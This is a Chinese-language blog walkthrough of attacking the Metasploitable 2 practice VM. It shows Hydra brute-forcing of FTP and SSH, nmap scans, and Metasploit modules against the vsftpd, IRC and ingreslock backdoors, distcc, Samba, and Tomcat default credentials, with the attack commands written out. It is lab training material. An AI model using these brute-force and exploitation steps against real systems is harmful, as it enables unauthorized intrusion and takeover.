系统简介:
Metasploitable是一个虚拟机文件,从网上下载解压之后就可以直接使用,无需安装。
靶机下载链接:http://downloads.metasploit.com/data/metasploitable/metasploitable-linux-2.0.0.zip
如何开始:
虚拟机设置完毕后, 就可以登录Metasploitable啦,用户名是 :msfadmin 密码是: msfadmin.
在shell中执行ifconfig命令来查看你的IP 地址.
开启的服务:
nmap 192.168.195.133
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512213743884-1722529770.png)
端口爆破:FTP、SSH等
工具:Hydra
备用字典
![](https://www.zccie.com/wp-content/uploads/2020/11/20161116091939627.jpg)
后面会用到tomcat 也可以加进去
将字典传到桌面上
一、爆破FTP
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt ftp://192.168.195.133
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512214812294-979713429.png)
二、爆破SSH
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.195.133 ssh
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512215136260-1671743430.png)
远程连接进行测试
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512215605945-1115301857.png)
成功连接
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512215631830-798615937.png)
三、端口渗透:
利用metasploit
然后在kali linux中进行渗透:
启动msf msfconsole
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512220058382-734976393.png)
端口1: 6667——-irc_3281_backdoor
登录msf search irc 找到对应得模块
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200513111959575-2033666440.png)
进入对应模块 查看配置 show options
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512220153573-1405352490.png)
设置主机名 进行漏洞利用 exploit 利用 ,
成功获取会话,root权限
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512220651689-305918658.png)
端口2 、6200——-vsftpd_234_backdoor
利用metasploit
找到利用模块
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200513112533574-1293041884.png)
切换模块 查看配置
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512221042458-1023461608.png)
反弹会话,root权限
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512221116166-663145959.png)
端口3、1524——-ingrelock_backdoor
利用telnet连接1524,直接返回root会话
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512221333253-817170107.png)
端口4、1099——-distcc程序漏洞—-ingrelock
利用metasploit
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512221550659-1559376797.png)
返回对话
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512221631262-935474356.png)
端口5、139——-samba为3.0漏洞
先用nmap进行详细扫描
nmap -v -A -T4 192.168.195.133
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512221839780-470002757.png)
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512221926204-1107182213.png)
metasploit有众多扫描模块,以适应不同的需要。在metasploit中同样可以使用nmap进行扫描。在命令行中直接键入指令即可。
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200513133152311-1892153134.png)
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200513133130412-1939860442.png)
Samba
利用metasploit
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512222512950-952455317.png)
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512223215599-150477756.png)
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512223654487-982228101.png)
端口6、8180——-Apache Tomcat弱口令
![复制代码](https://common.cnblogs.com/images/copycode.gif)
在终端中输入命令“nmap –sV 192.168.195.133”,对目标主机进行端口扫描,发现开放8180端口并且运行着ApacheTomcat/CoyoteJSP engine1.1。 在终端中输入命令“msfconsole”,启动MSF终端。 在终端下输入命令“search tomcat”, 搜索tomcat的相关工具和攻击载荷。 在终端输入“use auxiliary/scanner/http/tomcat_mgr_login”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。 在终端下输入“set RHOSTS 192.168.195.133”,设置攻击目标主机IP。 在终端下输入“set RPORT 8180”,设置攻击目标主机端口号. 在终端下输入“exploit”, 实施攻击。获得用户名tomcat,密码tomcat。 在终端下输入“use exploit/multi/http/tomcat_mgr_deploy”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。 在终端下输入“set RHOST 192.168.195.133”,设置攻击的目标主机IP。 在终端下输入“set RPORT 8180”,设置攻击的目标主机端口号。 在终端下输入“set username tomcat”,设置攻击时使用的登录账号tomcat。 在终端下输入“set userpassword tomcat”,设置攻击时使用的密码tomcat。 在终端下输入“exploit”,开始攻击,建立会话。 在终端下输入“getuid”,查看获取的用户权限。
![复制代码](https://common.cnblogs.com/images/copycode.gif)
在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放8180端口并且运行着ApacheTomcat/CoyoteJSP engine1.1。
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512230137864-1095358959.png)
- 在终端下输入命令“search tomcat”, 搜索tomcat的相关工具和攻击载荷。
- 在终端输入“use auxiliary/scanner/http/tomcat_mgr_login”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512230329652-1638082641.png)
use auxiliary/scanner/http/tomcat_mgr_login”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。 set RHOSTS 192.168.1.3”,设置攻击目标主机IP、 “set RPORT 8180”,设置攻击目标主机端口号 在终端下输入“exploit”, 实施攻击。获得用户名tomcat,密码tomcat。 使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200513115524974-1206520607.png)
用默认自带的字典即可,如果用桌面上字典 则需要设置set PASS_FILE ‘root/Desktop/password.txt’ & set USER_FILE ‘root/Desktop/user.txt’
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200513120848140-1068281045.png)
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200513120822984-901345749.png)
![在这里插入图片描述](https://www.zccie.com/wp-content/uploads/2020/11/2019051416004627.png)
search tomcat ,
show options
- 在终端下输入“set RHOST 192.168.195.133”,设置攻击的目标主机IP。
- 在终端下输入“set RPORT 8180”,设置攻击的目标主机端口号。
- 在终端下输入“set username tomcat”,设置攻击时使用的登录账号tomcat。
- 在终端下输入“set password tomcat”,设置攻击时使用的密码tomcat。
- 在终端下输入“exploit”,开始攻击,建立会话。
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200513120356062-1685652441.png)
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200513120922231-884703915.png)
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200513131753803-1017504531.png)
端口7、80——-PHP CGI参数注入执行漏洞
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200513115803172-1281565204.png)
![](https://www.zccie.com/wp-content/uploads/2020/11/1867841-20200512224548475-1300948770.png)
原文: